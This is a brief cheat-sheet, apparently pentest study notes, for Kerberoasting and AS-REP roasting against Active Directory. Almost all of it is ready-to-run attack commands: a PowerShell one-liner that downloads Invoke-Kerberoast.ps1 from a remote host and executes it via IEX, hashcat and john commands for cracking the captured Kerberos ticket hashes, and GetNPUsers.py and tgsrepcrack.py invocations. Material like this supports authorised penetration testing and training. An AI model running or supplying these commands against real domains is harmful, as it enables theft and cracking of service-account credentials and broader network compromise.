Kerberoast attack

Download Invoke-Kerberoast and get hash in crackable format.

(New-Object System.Net.WebClient).DownloadString('http://192.168.119.153/Invoke-Kerberoast.ps1') | IEX;Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

Once you have done the above, copy the hash and crack it with John or hashcat.

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast

hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt

For as-rep roasting:

GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -format hashcat

tgsrepcrack.py wordlist.txt hash.kirbi

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi